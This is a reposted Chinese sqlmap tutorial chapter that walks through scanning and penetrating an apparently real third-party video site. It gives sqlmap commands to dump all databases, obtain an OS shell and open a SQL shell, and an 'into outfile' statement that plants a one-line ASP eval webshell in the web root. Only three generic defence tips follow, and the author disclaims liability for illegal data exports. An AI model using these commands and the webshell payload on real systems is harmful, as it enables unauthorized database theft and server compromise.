sqlmap从入门到精通-第六章-6-9 扫描并渗透某快播站点

6.9 扫描并渗透某快播站点

6.9.1 扫描结果分析

1. 使用AWVS对目标进行扫描

2. 查看漏洞情况

需要注意的点:

(1) 不同的漏洞有不同的处理方法

(2) 可以根据扫描结果名称寻找漏洞的利用方法

(3) 之后就是一些sqlmap常规套路,前面章节演示了很多次,大家可以翻看前面章节内容

导出全部数据库

sqlmap.py -r bmfx.txt -D bmfx --dump-all

导出全部数存在法律风险,请大家一定要清楚,非法导出数据导致法律责任与本人无关

6.9.3 渗透利用思路

1. 渗透提权

sqlmap.py -r bmfx.txt --os-shell

2. 对服务器端口进行扫描

使用nmap或者masscan进行全端口扫描

3. 未能获取后台地址

4. 对存在跨站漏洞的地方进行跨站测试

5. 导出一句话后门

(1) 获取MySQL数据库保存地址

sqlmap.py -r bmfx.txt --sql-shell 如果成功执行命令,那么可以长执行select @@datadir 获取数据保存的位置

(2) 使用如下方式获取webshell

select '<%eval request("bmfx")%>' into outfile 'C:/interpub/wwwroot/bmfx.asp'

6.9.4 渗透总结与防御

1. 渗透总结

(1) 通过AWVS扫描出get参数存在SQL注入

(2) 通过分析头文件,将HTTP请求包数据保存为txt文件

(3) 通过sqlmap.py -r bmfx.txt 命令进行SQL注入测试

(4) 对目标SQL注入测试与其他测试一样,不同的就是名称不一样

(5) MySQL数据库root账号导出一句话后门

2. 安全防御

(1) 使用公开漏洞扫描软件对站点进行安全扫描,对存在漏洞的地方进行修复

(2) 增加WAF等相关应用层防火墙软件

(3) MySQL数据库用户应设置强健的密码

迷茫的人生,需要不断努力,才能看清远方模糊的志向!
原文地址:https://www.cnblogs.com/autopwn/p/13403308.html